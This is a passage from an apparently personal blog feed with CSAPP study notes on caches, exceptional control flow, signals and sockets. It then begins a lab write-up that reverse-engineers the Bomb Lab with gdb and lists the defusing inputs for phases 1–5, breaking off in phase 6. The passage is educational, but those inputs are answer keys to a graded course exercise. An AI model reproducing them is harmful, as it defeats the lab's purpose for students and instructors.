脏位）。这种方式大大降低了主存带宽要求，但控制可能很复杂。</li></ul></li><li>写不命中（Write Miss）: 要写的单元不在Cache中<ul><li>写分配（Write Allocate）<ul><li>将主存块装入Cache，然后更新相应单元。</li><li>试图利用空间局部性，但每次都要从主存中读入一个块。</li></ul></li><li>写不分配（Not Write Allocate）<ul><li>直接写主存单元，不把主存块装入到Cache。</li></ul></li></ul></li></ul></li></ul><h3 id="3-编写高速缓存友好的代码">3) 编写高速缓存友好的代码</h3><ul><li><p>确保代码高速缓存友好的基本方法</p><ul><li>让最常见的情况运行得快</li><li>尽量减小每个循环内部的缓存不命中数量</li></ul></li><li><p>编写高速缓存友好的代码的重要问题</p><ul><li>对局部变量的反复引用是好的，因为编译器能将它们缓存在寄存器中（时间局部性）</li><li>步长为1的引用模式是好的，因为存储器层次结构中所有层次上的缓存都是将数据存储为连续的块（空间局部性）</li></ul></li><li><p>示例代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;ctime&gt;</span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> m = <span class="number">10000</span>;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> n = <span 
class="number">1000</span>;</span><br><span class="line">  <span class="type">const</span> <span class="type">int</span> testNum = <span class="number">1000</span>;</span><br><span class="line">  <span class="type">int</span> total = <span class="number">0</span>;</span><br><span class="line">  <span class="type">int</span>** nums = <span class="keyword">new</span> <span class="type">int</span>* [m];</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">  &#123;</span><br><span class="line">    nums[i] = <span class="keyword">new</span> <span class="type">int</span>[n];</span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">      nums[i][j] = (i%<span class="number">10</span>) * (j%<span class="number">10</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="type">clock_t</span> t1 = <span class="built_in">clock</span>();</span><br><span class="line">  <span class="comment">// 高速缓存友好的代码</span></span><br><span class="line">  total = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> a = <span class="number">0</span>; a &lt; testNum; a++)</span><br><span class="line">    <span class="comment">// 索引顺序为 i,j</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">        total += nums[i][j];</span><br><span class="line"></span><br><span class="line">  <span class="type">clock_t</span> t2 = <span class="built_in">clock</span>();</span><br><span 
class="line">  <span class="comment">// 高速缓存不友好的代码</span></span><br><span class="line">  total = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">for</span> (<span class="type">int</span> a = <span class="number">0</span>; a &lt; testNum; a++)</span><br><span class="line">    <span class="comment">// 索引顺序为 j, i</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> j = <span class="number">0</span>; j &lt; n; j++)</span><br><span class="line">      <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; m; i++)</span><br><span class="line">        total += nums[i][j];</span><br><span class="line"></span><br><span class="line">  <span class="type">clock_t</span> t3 = <span class="built_in">clock</span>();</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;t1: &quot;</span> &lt;&lt; t1 &lt;&lt; <span class="string">&quot; t2: &quot;</span> &lt;&lt; t2 &lt;&lt; <span class="string">&quot; t3: &quot;</span> &lt;&lt; t3 &lt;&lt; endl;</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;高速缓存  友好代码所需时间: &quot;</span> &lt;&lt; t2 - t1 &lt;&lt; endl;</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;高速缓存不友好代码所需时间: &quot;</span> &lt;&lt; t3 - t2 &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>程序输出<br><img src="/2020/07/csapp/cache_code.png" alt="img"><br>其速度差距在这段代码的输出上表现的淋漓尽致，差距十分明显。</p></li></ul><h2 id="七、-链接">七、 链接</h2><blockquote><p>暂略</p></blockquote><h2 id="八、异常控制流">八、异常控制流</h2><h3 id="1-异常">1) 异常</h3><ul><li><p>现代系统通过使控制流发生突变来对各种系统状态的变化做出反应，这种突变称为<strong>异常控制流</strong>(Exceptional Control Flow, ECF)。异常控制流发生在计算机系统的各个阶段，例如上下文切换、发送与接受信号，以及应用程序通过使用<em>陷阱</em>(trap)或<em>系统调用</em>(system 
call)的ECF形式，向操作系统请求服务。</p></li><li><p>在任何情况下，当CPU检测到<em>事件</em>发生时，它会通过一张叫做<em>异常表</em>(exception-table)的跳转表，跳转至处理特定异常的<em>异常处理程序</em>(exception handler)进行处理。</p></li><li><p>异常处理完成后，会发生以下三种情况中的一种</p><ul><li>控制流返回当前指令(即引起异常的指令，例如缺页异常)</li><li>控制流返回下一条指令</li><li>终止当前被中断的程序</li></ul></li><li><p>异常的类别</p><table><thead><tr><th style="text-align:left">类别</th><th style="text-align:left">原因</th><th style="text-align:center">异步/同步</th><th style="text-align:left">返回行为</th></tr></thead><tbody><tr><td style="text-align:left">中断(interrupt)</td><td style="text-align:left">来自I/O设备的信号</td><td style="text-align:center">异步</td><td style="text-align:left">总是返回到下一条指令</td></tr><tr><td style="text-align:left">陷阱(trap)</td><td style="text-align:left">有意的异常</td><td style="text-align:center">同步</td><td style="text-align:left">总是返回到下一条指令</td></tr><tr><td style="text-align:left">故障(fault)</td><td style="text-align:left">潜在可恢复的错误</td><td style="text-align:center">同步</td><td style="text-align:left">可能返回到当前指令</td></tr><tr><td style="text-align:left">终止(abort)</td><td style="text-align:left">不可恢复的错误</td><td style="text-align:center">同步</td><td style="text-align:left">不会返回</td></tr></tbody></table><ul><li>中断<ul><li>一些I/O设备或芯片通过向CPU上的某个引脚发送信号，并将异常号放至系统总线上来触发中断。</li><li>在当前指令执行完成后，CPU注意该引脚上的电压变为高电平，则获取异常号并调用中断处理程序，最后将控制流返回到下一条指令。</li></ul></li><li>陷阱<ul><li>陷阱是一种<em>有意</em>的异常，其最重要的用途是在用户程序与内核间提供一个<em>系统调用</em>接口。利用该接口可进行读/写文件，加载程序等等。</li><li>执行syscall指令会导致一个异常处理程序的陷阱，该程序会解析参数并调用适当的内核程序。</li></ul></li><li>故障<ul><li>故障由错误情况引起，它可能被故障处理程序所修正。</li><li>其中一个经典的故障示例是<strong>缺页异常</strong>。</li></ul></li><li>终止<ul><li>终止是不可恢复的致命错误造成的后果，通常是一些硬件错误。</li></ul></li></ul></li></ul><h3 id="2-进程">2) 进程</h3><ul><li><strong>进程</strong>(process)是<em>一个执行中程序的实例</em>。系统中的每个程序都运行在某个进程的<strong>上下文</strong>(context)</li><li>进程上下文由程序运行所需的状态组成，包括内存中的代码与数据、栈、寄存器内容、环境变量、文件描述符集合等等。</li><li>进程这个抽象类型提供了一种假象：程序独占CPU与内存。其中程序占用CPU的控制流称为逻辑流，注意与CPU的物理流不一样。</li><li>一个逻辑流的执行时间在时间上与另一个流重叠，称为<em>并发流</em>(concurrent 
flow)。<br>多个流并发执行的一般现象称为<em>并发</em>(concurrency)。<br>一个进程和其他进程轮流运行的概念称为<em>多任务</em>(multitasking)。<br>一个进程执行它的控制流的一部分的每一时间段叫做<em>时间片</em>(time slice)。<br>如果两个流并发地运行在不同的处理器或计算机上，则这些流称为<em>并行流</em>(parallel flow)。它们<strong>并行运行，并发执行。</strong></li><li><strong>内核模式</strong><ul><li>一个运行在内核模式的进程可以执行指令集中的任何指令，并且可以访问系统中的任何内存位置。</li><li>与之相反的是，用户模式中的进程不允许执行<em>特权指令</em>(privileged instruction)，例如停止处理器，改变模式位，或清空cache等操作。同时也不允许直接访问内核区中的数据与代码，只能通过异常处理程序进入内核模式。</li></ul></li></ul><h3 id="3-进程控制">3) 进程控制</h3><ul><li>进程总是处于下面三种状态之一<ul><li><strong>运行</strong>。运行中的进程正在CPU上执行或等待被执行。</li><li><strong>停止</strong>。进程的执行被挂起(suspended)，并且不会被调度。<ul><li><code>SIGSTOP, SIGTSTP, SIGTTIN, SIGTTOU</code>信号会使一个运行中的进程停止</li><li><code>SIGCONT</code>信号会使一个停止的进程再次开始执行。</li></ul></li><li><strong>终止</strong>。进程永远地停止了。进程终止的三个原因：<ul><li>收到某个信号，其中该信号的默认行为是终止当前进程。</li><li>从主程序返回</li><li>调用exit函数。</li></ul></li></ul></li><li>回收子进程<ul><li>当一个进程由于某种原因终止时，该进程会被内核保存在一种已终止的状态，直到它被父进程回收(reaped)。</li><li>当回收完成后，内核将子进程退出状态传递给父进程并抛弃已终止的进程。</li><li>其中，一个终止但尚未被回收的进程称为<em>僵尸进程</em>(zombie)。</li><li>若父进程已经终止了，则该子进程称为<em>孤儿进程</em>，内核会安排init进程成为该子进程的父进程，并在它终止后负责回收。<blockquote><p>init进程的pid为1，它不会终止，是所有进程的祖先。</p></blockquote></li></ul></li><li>sleep函数会使当前进程休眠。需要注意的是，休眠的进程可能因为一个信号中断而提前返回。</li></ul><h3 id="4-信号">4) 信号</h3><ul><li>Linux<em>信号</em>(signal)是一种更高层的软件形式的异常。它允许进程和内核中断其他进程。</li><li>信号提供了一种机制，通知用户进程发生了这些异常。</li><li>以下是linux系统上支持的信号列表<br><img src="/2020/07/csapp/signals.png" alt="img"></li><li>传递一个信号到目的进程的步骤<ul><li>发送信号<ul><li>内核通过更新目的进程上下文的某个状态，发送一个信号给目的进程</li></ul></li><li>接收信号<ul><li>进程可以忽略信号，终止或者通过执行信号处理程序来捕获这个信号。</li><li>每个信号类型都有一个预定义的默认行为。<ul><li>进程终止</li><li>进程终止并转储内存</li><li>进程停止(挂起)直到被SIGCONT信号重启</li><li>进程忽略该信号</li></ul></li></ul></li></ul></li><li>信号是不排队的。如果待处理信号里已经存在当前类型的信号，则当前信号会被丢弃。</li><li>使用信号时，需要考虑是否存在<strong>条件竞争</strong></li></ul><h3 id="5-非本地跳转">5) 非本地跳转</h3><ul><li>C语言提供了一种用户级异常控制流形式，称为<em>非本地跳转</em>(nonlocal 
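jump). It transfers control directly from one function to another currently executing function, without going through the normal call-and-return sequence.</li><li>Nonlocal jumps are provided by the <code>setjmp</code> and <code>longjmp</code> functions<ul><li><code>setjmp</code>/<code>sigsetjmp</code><ul><li>setjmp saves the current <em>calling environment</em> in the env buffer for later use by longjmp, and returns 0.</li><li>The calling environment includes the program counter, the stack pointer, the general-purpose registers, and so on</li><li>The return value of setjmp must not be assigned to a variable; it can only be used directly, for example as the test in a switch or conditional statement</li></ul></li><li><code>longjmp</code>/<code>siglongjmp</code><ul><li>longjmp restores the calling environment from the env buffer and then triggers a return from the most recent setjmp call that initialized env.</li><li>setjmp then returns with the nonzero return value retval.</li></ul></li></ul></li><li>Important applications<ul><li>One important application is returning immediately from a deeply nested function call, usually because some error condition was detected.</li><li>The exception mechanisms in C++ and Java are higher-level, more structured versions of C's setjmp and longjmp.<br>Roughly speaking, a catch clause in a try statement is akin to setjmp, and a throw statement is akin to longjmp.</li></ul></li></ul><h2 id="九-虚拟内存">9. Virtual Memory</h2><blockquote><p>The virtual memory part is skipped for now; I will come back to it when studying operating systems.<br>The dynamic memory allocation part is also skipped for now, because I have already studied glibc's ptmalloc (those notes are on this blog as well).</p></blockquote><h2 id="十-系统级I-O">10. System-Level I/O</h2><blockquote><p>Skipped for now</p></blockquote><h2 id="十一-网络编程">11. Network Programming</h2><h3 id="1-网络">1) Networks</h3><ul><li>The crucial property of an internet is that it can be built from assorted LANs and WANs that use radically different and incompatible technologies.</li><li>How can a source host send data bits to a destination host across all of these incompatible networks? The solution is <strong>a layer of protocol software running on every host and router</strong> that smooths out the differences between networks. The protocol must provide two basic capabilities:<ul><li><strong>Naming scheme</strong>. The internet protocol removes naming differences by defining a uniform format for host addresses. Each host is assigned at least one of these <em>internet addresses</em>, which uniquely identifies it.</li><li><strong>Delivery mechanism</strong>. The internet protocol removes delivery differences by defining a uniform way to bundle data bits into discrete chunks called <em>packets</em>. A packet consists of a <em>header</em> and a <em>payload</em>: the header contains the packet size and the addresses of the source and destination hosts, and the payload contains the data bits sent from the source host.</li></ul></li><li>The essence of the internet idea: <strong>encapsulation</strong></li></ul><h3 id="2-全球IP因特网">2) The Global IP Internet</h3><h4 id="1-IP地址">1. 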
IP Addresses</h4><ul><li><p>An IPv4 address is a 32-bit unsigned integer. Network programs store IP addresses in the following structure</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IP address structure */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> s_addr; <span class="comment">/* Address in network byte order (Big-endian) */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>Because Internet hosts can have different host byte orders, TCP/IP defines a uniform <em>network byte order</em> for every integer data item: <strong>big-endian byte order</strong>.</p></li><li><p>Unix provides the following functions for converting between network and host byte order.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="comment">// Return the value in network byte order</span></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">htonl</span><span class="params">(<span class="type">uint32_t</span> hostlong)</span></span>;</span><br><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">htons</span><span class="params">(<span class="type">uint16_t</span> hostshort)</span></span>;</span><br><span class="line"><span class="comment">// Return the value in host byte order</span></span><br><span class="line"><span class="function"><span class="type">uint32_t</span> <span class="title">ntohl</span><span 
class="params">(<span class="type">uint32_t</span> netlong)</span></span>;</span><br><span class="line"><span class="function"><span class="type">uint16_t</span> <span class="title">ntohs</span><span class="params">(<span class="type">uint16_t</span> netshort)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>IP addresses are usually written in a form called <em>dotted-decimal notation</em>.</p><blockquote><p>For example, <code>128.2.194.242</code> is the dotted-decimal representation of the address <code>0x8002c2f2</code>.<br>Applications use the following functions to convert between IP addresses and dotted-decimal strings.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"><span class="comment">// Returns: 1 on success, 0 if src is not a valid dotted-decimal address, -1 on error</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">inet_pton</span><span class="params">(AF_INET, <span class="type">const</span> <span class="type">char</span>* src, <span class="type">void</span>* dst)</span></span>;</span><br><span class="line"><span class="comment">// Returns: pointer to the dotted-decimal string on success, NULL on error</span></span><br><span class="line"><span class="function"><span class="type">const</span> <span class="type">char</span>* <span class="title">inet_ntop</span><span class="params">(AF_INET, <span class="type">const</span> <span class="type">void</span>* src, <span class="type">char</span>*dst, <span class="type">socklen_t</span> size)</span></span>;</span><br></pre></td></tr></table></figure></li></ul><h4 id="2-因特网域名">2. 
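Internet Domain Names</h4><ul><li>The Internet defines a set of <em>domain names</em>, which are easier for people to remember, together with a mechanism that maps domain names to IP addresses.</li><li>The set of domain names forms a hierarchy.<br><img src="/2020/07/csapp/doman_struct.png" alt="img"></li><li>The Internet defines a mapping between the set of domain names and the set of IP addresses. Today this mapping is maintained by DNS (the Domain Name System).</li></ul><h4 id="3-因特网连接">3. Internet Connections</h4><ul><li>Internet clients and servers communicate by sending and receiving streams of bytes over <em>connections</em>. A connection is <strong>point-to-point, full duplex, and reliable</strong>.</li><li>A <strong>socket</strong> is an endpoint of a connection. Each socket has a corresponding <strong>socket address</strong> made up of an Internet address and a 16-bit <em>integer port</em>, written as "address:port".</li><li>When a client initiates a connection request, the port in the client's socket address is assigned automatically by the kernel and is called an <strong>ephemeral port</strong>. The port in the server's socket address, however, is usually a <strong>well-known port</strong> associated with the service.<blockquote><p>For example, port 80 for Web servers and port 21 for FTP control connections (port 20 is the FTP data port).</p></blockquote></li><li>A connection is uniquely identified by the socket addresses of its two endpoints. This pair of socket addresses is called a <strong>socket pair</strong> and is written as the tuple <code>(cliaddr:cliport, servaddr:servport)</code></li></ul><h3 id="3-套接字接口">3) The Sockets Interface</h3><ul><li><p>The <strong>sockets interface</strong> is a set of functions used together with the Unix I/O functions to build network applications.</p></li><li><p>Below is an overview of the sockets interface in the context of a typical client-server transaction.<br><img src="/2020/07/csapp/socket_concept_pic.png" alt="img"></p></li><li><p>Socket address structures</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* IP socket address structure */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr_in</span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span>      sin_family;   <span class="comment">/* Protocol family (always AF_INET) */</span></span><br><span class="line">  <span class="type">uint16_t</span>      sin_port;     <span class="comment">/* Port number in network byte 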
order */</span></span><br><span class="line">  <span class="keyword">struct</span> in_addr sin_addr;    <span class="comment">/* IP address in network byte order */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">char</span> sin_zero[<span class="number">8</span>];  <span class="comment">/* Pad to sizeof(struct sockaddr) */</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="comment">/* Generic socket address structure (for connect, bind, and accept) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr</span>&#123;</span><br><span class="line">  <span class="type">uint16_t</span>  sa_family;    <span class="comment">/* Protocol family */</span></span><br><span class="line">  <span class="type">char</span>      sa_data[<span class="number">14</span>];  <span class="comment">/* Address data */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>By default, the kernel assumes that a descriptor created by the <code>socket</code> function corresponds to an <strong>active socket</strong>.<br>The <code>listen</code> function converts sockfd from an active socket into a <strong>listening socket</strong> that can accept connection requests from clients.<br>The <code>accept</code> function returns a <strong>connected descriptor</strong>. (Here "socket" and "descriptor" both refer to the socket.)</p><blockquote><p>Take care to distinguish the <strong>listening descriptor</strong> from the <strong>connected descriptor</strong>.<br>1. The listening descriptor serves as an endpoint for client connection requests. It is typically created once and exists for the lifetime of the server.<br>2. The connected descriptor is an endpoint of a connection that has been established between a client and the server. It is created each time the server accepts a connection request and exists only while the server is servicing that client.<br><img src="/2020/07/csapp/connfdOrlistenfg.png" alt="img"><br>Keeping the <strong>listening descriptor</strong> and the <strong>connected descriptor</strong> separate makes it easier to build concurrent servers.</p></blockquote></li><li><p>Programs establish connections using functions such as <code>socket</code>, <code>connect</code>, <code>bind</code>, <code>listen</code>, and <code>accept</code>.</p></li></ul><h2 id="十二-并发编程">12. 
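Concurrent Programming</h2><ul><li>When accessing a shared variable, a concurrent program must lock it to avoid unintended race conditions.</li><li>Concurrent programs must avoid deadlock<br><img src="/2020/07/csapp/deadLockPic.png" alt="img"></li></ul><blockquote><p>The rest is omitted for now; I will study concurrency further when I get to operating systems.</p></blockquote>]]></content>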
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里存放着一点笔者阅读CSAPP所记录的笔记&lt;/li&gt;
&lt;li&gt;由于CSAPP内容众多，这里只记录了一些笔者学习的主要点&lt;/li&gt;
&lt;li&gt;根据笔者的进度，持续更新。单次更新随缘记录。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="CSAPP" scheme="https://kiprey.github.io/tags/CSAPP/"/>
    
    <category term="计算机基础" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E5%9F%BA%E7%A1%80/"/>
    
  </entry>
  
  <entry>
    <title>CSAPP Lab WriteUp</title>
    <link href="https://kiprey.github.io/2020/07/csapp-lab-writeup/"/>
    <id>https://kiprey.github.io/2020/07/csapp-lab-writeup/</id>
    <published>2020-07-22T06:53:29.000Z</published>
    <updated>2025-11-24T03:59:39.926Z</updated>
    
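    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>This post collects write-ups for some of the CSAPP labs, along with a few takeaways</li><li>The code is available on <a href="https://github.com/Kiprey/Skr_Learning/tree/master/week9-19/CSAPP-Lab">github</a></li></ul><span id="more"></span><ul><li>The post is long; use the navigation bar on the right to jump to a section.</li></ul><h2 id="1-Data-Lab">1. Data Lab</h2><ul><li>In the lab directory, run <code>make all</code> in a terminal to build the code</li><li>The task is to implement every function in <code>bits.c</code>. Each function comes with its own restrictions, for example a ban on the <code>!</code> operator.</li><li>Run <code>./btest</code> to test the functions in <code>bits.c</code></li><li>Run <code>./dlc bits.c</code> to check whether the functions in <code>bits.c</code> use any forbidden operators. If everything is fine, it prints nothing.</li><li>Run <code>./ishow &lt;intNum&gt;</code> or <code>./fshow &lt;floatNum&gt;</code> to see detailed information about the hexadecimal value passed in</li><li>My implementation is on <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/1.%20Data%20Lab/bits.c">github</a><blockquote><p>The whole write-up is embedded in the code as comments, which makes it easier to read and follow</p></blockquote></li></ul><h2 id="2-Bomb-Lab">2. Bomb Lab</h2><ul><li>The Bomb Lab is a bomb-defusing exercise: we disassemble and reverse-engineer the binary to find the input that defuses each phase</li><li>Reading <code>bomb.c</code> shows that the program can open a file and use it as its input source.<br>So we can create a file and store each answer in it as we find it, to avoid retyping</li><li>If you are not comfortable with gdb, see <a href="/2020/04/gdb_command/">common gdb commands</a></li><li>Run <code>gdb bomb</code>, set a breakpoint at the start of main, and enter <code>run input.txt</code> to start debugging.<blockquote><p><code>input.txt</code> is the argument passed to bomb (the name of the input file)</p></blockquote></li><li>While searching for an answer, enter any string that is easy to recognize, such as <code>1122333</code><blockquote><p>Note that <code>read_line</code> replaces the last character of each line (normally <code>\n</code>) with <code>\0</code>. If the last character of the input file is not a throwaway character such as <code>\n</code>, the final character of the answer is cut off. The most reliable way to avoid this is to end every answer line in the input file with a newline.</p></blockquote></li></ul><h3 id="1-phases-1">1) phase_1</h3><p>Step into the <code>phase_1</code> function. The program calls <code>strings_not_equal</code> to check whether the input string equals a specific string; if it does not, the bomb explodes.<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_1.png" alt="img"><br>So the answer to phase 1 is <code>Border relations with Canada have never been better.</code> (do not drop the final <em>period</em>)</p><h3 id="2-phases-2">2) 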
phase_2</h3><p>The <code>phase_2</code> function first calls <code>read_six_numbers</code> to read six numbers from the input line, then checks <code>a == 1 ?</code><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_2_1.png" alt="img"></p><blockquote><p>To simplify the explanation, the six input numbers are named <strong>a, b, c, d, e, f</strong>.<br>The test <strong>is a equal to b</strong> is written <code>a == b ?</code></p></blockquote><p>It then loops, checking  <strong>2 * current number == next number ?</strong><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_2_2.png" alt="img"><br>In other words, it checks that the six numbers form a <strong>geometric sequence with ratio 2 that starts at 1</strong>; the phase is passed if every check succeeds. So the answer to phase 2 is <code>1 2 4 8 16 32</code></p><h3 id="3-phases-3">3) phase_3</h3><p>The <code>phase_3</code> function first converts the input line into two numbers (the bomb explodes if it does not get two), then checks the first number: <code>a &lt;= 7 ?</code>. The required second number depends on the first: if the second number equals the constant selected by the first, the phase is passed.<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_3.png" alt="img"><br>This gives one answer to phase 3: <code>7 327</code> (the answer is not unique)</p><h3 id="4-phases-4">4) phase_4</h3><p>Like <code>phase_3</code>, the <code>phase_4</code> function reads two numbers. It then does the following</p><ul><li>Checks that the first number <code>a</code> is at most 14 (note that <code>a</code> is compared as an unsigned integer)</li><li>Calls <code>func4(a, 0, 14)</code> and checks that the return value is 0</li><li>Checks that the second number <code>b</code> is 0</li></ul><p><img src="/2020/07/csapp-lab-writeup/bomblab_phases_4.png" alt="img"><br><code>func4</code> is unusual in that it calls itself recursively. Working through its disassembly gives the following C code</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">func4</span><span class="params">(<span class="type">int</span> arg0, <span class="type">int</span> arg1, <span class="type">int</span> arg2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tmp1 = arg2 - arg1;</span><br><span class="line">    <span class="comment">// logical right shift extracts the sign bit</span></span><br><span class="line">    <span class="type">int</span> tmp2 = (tmp1 &gt;&gt; <span class="number">31</span>) + tmp1;</span><br><span class="line">    tmp2 &gt;&gt;= <span class="number">1</span>; <span class="comment">// arithmetic right shift</span></span><br><span class="line">    <span class="type">int</span> tmp3 = tmp2 + arg1;</span><br><span class="line">    <span class="keyword">if</span> (tmp3 &lt;= arg0)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> (tmp3 &gt;= arg0) <span class="comment">// in effect, tmp3 == arg0</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">func4</span>(arg0, tmp3 + <span class="number">1</span>, arg2) + <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">2</span> * <span class="built_in">func4</span>(arg0, arg1, tmp3 - <span class="number">1</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Brute-force enumeration shows that <code>func4(x, 0, 14) == 0</code> has four solutions: 0, 1, 3, and 7.<br>So one answer to phase 4 is <code>0 0</code> (the answer is not unique)</p><h3 id="5-phases-5">5) 
phase_5</h3><p>In the <code>phase_5</code> function, the program</p><ol><li>Checks that the input string has length 6</li><li>Loops six times, each time using <code>ch &amp; 0xf</code> as an index to pick one character from the global string <strong>maduiersnfotvbyl</strong><br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_5.png" alt="img"></li><li>After the six iterations, compares the selected characters with the string <code>flyers</code>; if they match, the phase is passed</li></ol><p>From this, an answer to phase 5 is <code>ionefg</code> / <code>IONEFG</code> (the answer is not unique)</p><h3 id="6-phases-6">6) phase_6</h3><p>The <code>phase_6</code> function is harder. For the explanation, the six input numbers are named <strong>a1, a2, a3, a4, a5, a6</strong>.</p><ul><li><p>The first part is a nested loop.<br><img src="/2020/07/csapp-lab-writeup/bomblab_phases_6_1.png" alt="img"><br>To make it easier to follow, the assembly for the nested loop is translated into the C code below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// the six input 